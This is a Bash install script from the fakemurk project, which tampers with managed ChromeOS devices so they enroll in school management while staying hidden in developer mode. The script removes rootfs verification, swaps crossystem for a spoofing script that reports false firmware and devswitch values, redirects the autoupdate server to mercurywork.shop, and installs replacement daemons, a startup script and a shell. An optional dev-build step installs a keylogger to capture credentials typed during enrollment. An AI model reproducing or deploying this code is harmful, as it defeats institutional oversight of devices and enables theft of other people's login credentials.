fakemurk/fakemurk.sh.pre

. /usr/share/misc/chromeos-common.sh || :

#define DEVBUILD_FLAG 1

#if DEVBUILD_FLAG==1
DEVBUILD=1
devbuild_config() {
    swallow_stdin

    read -r -p "Would you like to enable enrollment credentential capturer? After finishing the script, the next boot will detect all keypresses during enrollment setup and save them to a file. This file is ONLY STORED LOCALLY, and is deleted as soon as you read it, which you can confirm by reading the source code. By using this you also acknowledge that you have permission to capture these credentials. (y\N)" choice
    echo "THIS FEATURE IS FOR CYBER SECURITY RESEARCH ONLY, DO NOT USE UNLESS YOU HAVE RED TEAM PERMISSION"
    case "$choice" in
    Y | y) INSTALL_LOGKEYS=1 ;;
    esac
}

drop_logkeys() {
    mkdir "$ROOT/logkeys"

    base64 -d <<-EOF | bunzip2 -dc >"$ROOT/usr/bin/logkeys"
#include "logkeys.elf.b64"
EOF

    base64 -d <<-EOF | bunzip2 -dc >"$ROOT/logkeys/keymap.map"
#include "keymap.map.b64"
EOF
    chmod 777 "$ROOT/usr/bin/logkeys"
    ln -s "$ROOT/bin/grep" "$ROOT/sbin/grep"
    touch "$ROOT/sbin/dumpkeys"
}

devbuild_patchroot() {
    if [ "$INSTALL_LOGKEYS" == "1" ]; then
        echo "installing logkeys"
        drop_logkeys
        touch "$ROOT/logkeys/active"
    fi
}

#endif

traps() {
    set -e
    trap 'last_command=$current_command; current_command=$BASH_COMMAND' DEBUG
    trap 'echo "\"${last_command}\" command failed with exit code $?. THIS IS A BUG, REPORT IT HERE https://github.com/MercuryWorkshop/fakemurk"' EXIT
}
leave() {
    trap - EXIT
    echo "exiting successfully"
    exit
}
config() {
    swallow_stdin

    echo "please enter the your managed email's domain. example: if your email is \"randomstudent@skid.edu\" then you will enter skid.edu"
    echo "if you don't enter it correctly you won't be able to login, double check this"
    read -r -p "> " EMAIL
    echo

    swallow_stdin
    echo
    read -r -p "Would you like to enable rootfs restore? It will add an option to quickly revert all changes and re-enroll. (Y/n)" choice
    case "$choice" in
    N | n | no | No | NO) ROOTFS_BACKUP=0 ;;
    *) ROOTFS_BACKUP=1 ;;
    esac

    if [ "$DEVBUILD" == "1" ]; then
        devbuild_config
    fi
}
disable_rootfs_backup() {
    echo "rootfs verification is disabled for this partition, and thus it is not eligable for backup. ignoring..."
    ROOTFS_BACKUP=0
}

swallow_stdin() {
    while read -t 0 notused; do
        read input
    done
}

fakemurk_info() {
    ascii_info
    sleep 3
    cat <<-EOF

WARNING: THIS SCRIPT WILL REQUIRE THE REMOVAL OF ROOTFS VERIFICATION, AND THE DISABLING OF AUTOUPDATES
THIS MEANS THAT IF YOU EVER TURN OFF DEVMODE, YOUR SYSTEM WILL BE BRICKED UNTIL RECOVERY

WE ARE NOT RESPONSIBLE FOR DAMAGE, YOU BEING STUPID AND MISUSING THIS, OR GETTING IN TROUBLE
DO YOU UNDERSTAND??

(enter to proceed, ctrl+c to quit)
EOF
    swallow_stdin
    read
}

csys() {
    if [ "$COMPAT" == "1" ]; then
        crossystem "$@"
    elif test -f "$ROOT/usr/bin/crossystem.old"; then
        "$ROOT/usr/bin/crossystem.old" "$@"
    else
        "$ROOT/usr/bin/crossystem" "$@"
    fi
}
cvpd() {
    if [ "$COMPAT" == "1" ]; then
        vpd "$@"
    elif test -f "$ROOT/usr/sbin/vpd.old"; then
        "$ROOT/usr/sbin/vpd.old" "$@"
    else
        "$ROOT/usr/sbin/vpd" "$@"
    fi
}

sed_escape() {
    echo -n "$1" | while read -n1 ch; do
        if [[ "$ch" == "" ]]; then
            echo -n "\n"
            # dumbass shellcheck not expanding is the entire point
        fi
        echo -n "\\x$(printf %x \'"$ch")"
    done
}

raw_crossystem_sh() {
    base64 -d <<-EOF | bunzip2 -dc
#include "crossystem.sh.b64"
EOF
}

raw_pollen() {
    base64 -d <<-EOF | bunzip2 -dc
#include "pollen.json.b64"
EOF
}
drop_daemon() {
    base64 -d <<-EOF | bunzip2 -dc >"$ROOT/etc/init/pre-startup.conf"
#include "pre-startup.conf.b64"
EOF
    base64 -d <<-EOF | bunzip2 -dc >"$ROOT/sbin/fakemurk-daemon.sh"
#include "fakemurk-daemon.sh.b64"
EOF
    chmod 777 "$ROOT/sbin/fakemurk-daemon.sh"
}
drop_startup_patch() {
    move_bin "$ROOT/sbin/chromeos_startup.sh"
    base64 -d <<-EOF | bunzip2 -dc >"$ROOT/sbin/chromeos_startup.sh"
#include "chromeos_startup.sh.b64"
EOF
    chmod 777 "$ROOT/sbin/chromeos_startup.sh"
}
drop_mush() {
    move_bin "$ROOT/usr/bin/crosh"
    base64 -d <<-EOF | bunzip2 -dc >"$ROOT/usr/bin/crosh"
#include "mush.sh.b64"
EOF
    chmod 777 "$ROOT/usr/bin/crosh"
}

drop_crossystem_sh() {
    vals=$(sed "s/ /THIS_IS_A_SPACE_DUMBASS/g" <<<"$(crossystem_values)")
    raw_crossystem_sh | sed -e "s/#__SED_REPLACEME_CROSSYSTEM_VALUES#/$(sed_escape "$vals")/g" | sed -e "s/THIS_IS_A_SPACE_DUMBASS/ /g" >"$ROOT/usr/bin/crossystem"
    chmod 777 "$ROOT/usr/bin/crossystem"
}
drop_pollen() {
    mkdir -p "$ROOT/etc/opt/chrome/policies/managed"
    raw_pollen | sed -e "s/__SED_REPLACEME_SCHOOL_EMAIL__/${EMAIL}/g" >$ROOT/etc/opt/chrome/policies/managed/policy.json
    chmod 777 "$ROOT/etc/opt/chrome/policies/managed/policy.json"

}

escape() {
    case $1 in
    '' | *[!0-9]*) echo -n "\"$1\"" ;;
    *) echo -n "$1" ;;
    esac
}

crossystem_values() {
    readarray -t csys_lines <<<"$(csys)"
    for element in "${csys_lines[@]}"; do
        line_stripped=$(echo "$element" | sed -e "s/#.*//g" | sed -e 's/ .*=/=/g')
        # sed 1: cuts out all chars after the #
        # sed 2: cuts out all spaces before =
        IFS='=' read -r -a pair <<<"$line_stripped"

        key=${pair[0]}
        # cut out all characters after an instance of 2 spaces in a row
        val="$(echo ${pair[1]} | sed -e 's/  .*//g')"
        if [ "$key" == "devsw_cur" ]; then
            val=0
        fi
        if [ "$key" == "devsw_boot" ]; then
            val=0
        fi
        if [ "$key" == "mainfw_type" ]; then
            val="normal"
        fi
        if [ "$key" == "mainfw_act" ]; then
            val="A"
        fi
        if [ "$key" == "cros_debug" ]; then
            val=0
        fi
        if [ "$key" == "dev_boot_legacy" ]; then
            val=0
        fi
        if [ "$key" == "dev_boot_signed_only" ]; then
            val=0
        fi
        if [ "$key" == "dev_boot_usb" ]; then
            val=0
        fi
        if [ "$key" == "dev_default_boot" ]; then
            val="disk"
        fi
        if [ "$key" == "dev_enable_udc" ]; then
            val=0
        fi
        if [ "$key" == "alt_os_enabled" ]; then
            val=0
        fi
        if [ "$key" == "recoverysw_boot" ]; then
            val=0
        fi
        if [ "$key" == "recoverysw_cur" ]; then
            val=0
        fi
        echo "$key=$(escape "$val")"
    done
}
move_bin() {
    if test -f "$1"; then
        mv "$1" "$1.old"
    fi
}

is_target_booted() {
    [ -z "$COMPAT" ] && [ "$(get_booted_kernnum)" == "$TGT_KERNNUM" ]
}
opposite_num() {
    if [ "$1" == "2" ]; then
        echo -n 4
    elif [ "$1" == "4" ]; then
        echo -n 2
    elif [ "$1" == "3" ]; then
        echo -n 5
    elif [ "$1" == "5" ]; then
        echo -n 3
    else
        return 1
    fi
}

disable_autoupdates() {
    # thanks phene i guess?
    sed -i "$ROOT/etc/lsb-release" -e "s/CHROMEOS_AUSERVER=.*/CHROMEOS_AUSERVER=$(sed_escape "https://mercurywork.shop/update")/"
}

prepare_target_root() {
    sleep 2
    if verity_enabled_for_n "$TGT_KERNNUM"; then
        echo "removing rootfs verification on target kernel $TGT_KERN_DEV"
        /usr/share/vboot/bin/make_dev_ssd.sh --remove_rootfs_verification --partitions "$TGT_KERNNUM" -i "$DST" 2>/dev/null
        if is_target_booted; then
            # if we're booted from the target kernel, we need to reboot. this is a pretty rare circumstance

            cat <<-EOF
ROOTFS VERIFICATION SUCCESSFULLY REMOVED
IN ORDER TO PROCCEED, THE CHROMEBOOK MUST BE REBOOTED

PRESS ENTER TO REBOOT, THEN ONCE BOOTED RUN THIS SCRIPT AGAIN
EOF
            swallow_stdin
            read -r
            reboot
            leave
        fi
    fi

    if ! is_target_booted; then
        mkdir /tmp/rootmnt
        mount "$TGT_ROOT_DEV" /tmp/rootmnt
        ROOT=/tmp/rootmnt
    else
        ROOT=
    fi
}
get_largest_nvme_namespace() {
    local largest size tmp_size dev
    size=0
    dev=$(basename "$1")

    for nvme in /sys/block/"${dev%n*}"*; do
        tmp_size=$(cat "${nvme}"/size)
        if [ "${tmp_size}" -gt "${size}" ]; then
            largest="${nvme##*/}"
            size="${tmp_size}"
        fi
    done
    echo "${largest}"
}
verity_enabled_for_n() {
    grep -q "root=/dev/dm" <"${DST}p${1}"
}
get_booted_kernnum() {
    if (($(cgpt show -n "$DST" -i 2 -P) > $(cgpt show -n "$DST" -i 4 -P))); then
        echo -n 2
    else
        echo -n 4
    fi
}
cleanup() {

    if [ "$COMPAT" == "1" ]; then
        echo "pressure washing..."
        yes | mkfs.ext4 "${DST}p1" >/dev/null 2>&1 || : # hope you didn't have anything valuable on there
    fi

    cvpd -i RW_VPD -s check_enrollment=1 2>/dev/null
    cvpd -i RW_VPD -s block_devmode=0 2>/dev/null
    csys block_devmode=0 2>/dev/null
}

set_kernel_priority() {
    cgpt add "$DST" -i 4 -P 0
    cgpt add "$DST" -i 2 -P 0
    cgpt add "$DST" -i "$TGT_KERNNUM" -P 1
}

configure_target() {
    DST=/dev/$(get_largest_nvme_namespace)
    if [ "$DST" == "/dev/" ]; then
        DST=/dev/mmcblk0
    fi

    if verity_enabled_for_n 2 && verity_enabled_for_n 4; then
        TGT_KERNNUM=
    elif verity_enabled_for_n 2; then
        TGT_KERNNUM=4
    elif verity_enabled_for_n 4; then
        TGT_KERNNUM=2
    else
        TGT_KERNNUM=
        if [ "$ROOTFS_BACKUP" == "1" ]; then
            echo "Rootfs restore is requested to be enabled, but both partitions have rootfs verification disabled. Please go through the recovery process to enable rootfs verification or run again and do not choose to enable rootfs restore."
            leave
        fi
    fi

    if [ "$TGT_KERNNUM" != "2" ] && [ "$TGT_KERNNUM" != "4" ]; then
        if [ "$COMPAT" == "1" ]; then
            TGT_KERNNUM=2
        else
            TGT_KERNNUM=$(opposite_num "$(get_booted_kernnum)")
        fi
    fi
    TGT_ROOTNUM=$((TGT_KERNNUM + 1))
    TGT_KERN_DEV="${DST}p$TGT_KERNNUM"
    TGT_ROOT_DEV="${DST}p$TGT_ROOTNUM"

    ALT_ROOTNUM=$(opposite_num "$TGT_ROOTNUM")
    ALT_KERNNUM=$(opposite_num "$TGT_KERNNUM")
    ALT_KERN_DEV="${DST}p$ALT_KERNNUM"
    ALT_ROOT_DEV="${DST}p$ALT_ROOTNUM"

    echo "target kern is $TGT_KERNNUM@$TGT_KERN_DEV"
    echo "target root is $TGT_ROOTNUM@$TGT_ROOT_DEV"
    echo
    echo "backup kern is $ALT_KERNNUM@$ALT_KERN_DEV"
    echo "backup root is $ALT_ROOTNUM@$ALT_ROOT_DEV"
}

patch_root() {
    echo "disabling autoupdates"
    disable_autoupdates
    sleep 2
    echo "dropping crossystem.sh"
    mv "$ROOT/usr/bin/crossystem" "$ROOT/usr/bin/crossystem.old"
    drop_crossystem_sh
    echo "staging sshd"
    sleep 2
    echo "dropping pollen"
    drop_pollen
    sleep 2
    echo "preventing stateful bootloop"
    drop_startup_patch
    if [ "$COMPAT" == "1" ]; then
        touch "$ROOT/stateful_unfucked"
    fi
    echo "installing mush shell"
    drop_mush
    sleep 2
    echo "dropping fakemurk daemon"
    drop_daemon

    if [ "$DEVBUILD" == "1" ]; then
        devbuild_patchroot
    fi
}
main() {
    traps
    fakemurk_info
    config

    if csys mainfw_type?recovery; then
        echo "Entering shim compatability mode"
        COMPAT=1
        stty sane
        sleep 1
    fi

    echo "----- stage 1: grabbing disk configuration -----"
    configure_target

    sleep 2

    echo "----- stage 2: patching target rootfs -----"
    prepare_target_root
    patch_root
    sync

    sleep 2

    echo "----- stage 3: cleaning up -----"
    cleanup
    sleep 1
    echo "setting kernel priority"
    set_kernel_priority

    sleep 1
    echo "done! press enter to reboot, and your chromebook should enroll into management when rebooted, but stay hidden in devmode"
    swallow_stdin
    read -r
    reboot
    leave

}
if [ "$0" = "$BASH_SOURCE" ]; then
    stty sane
    # if [ "$SHELL" != "/bin/bash" ]; then
    #     echo "hey! you ran this with \"sh\" (or some other shell). i would really prefer if you ran it with \"bash\" instead"
    # fi

    if [ "$EUID" -ne 0 ]; then
        echo "Please run as root"
        exit
    fi
    main
fi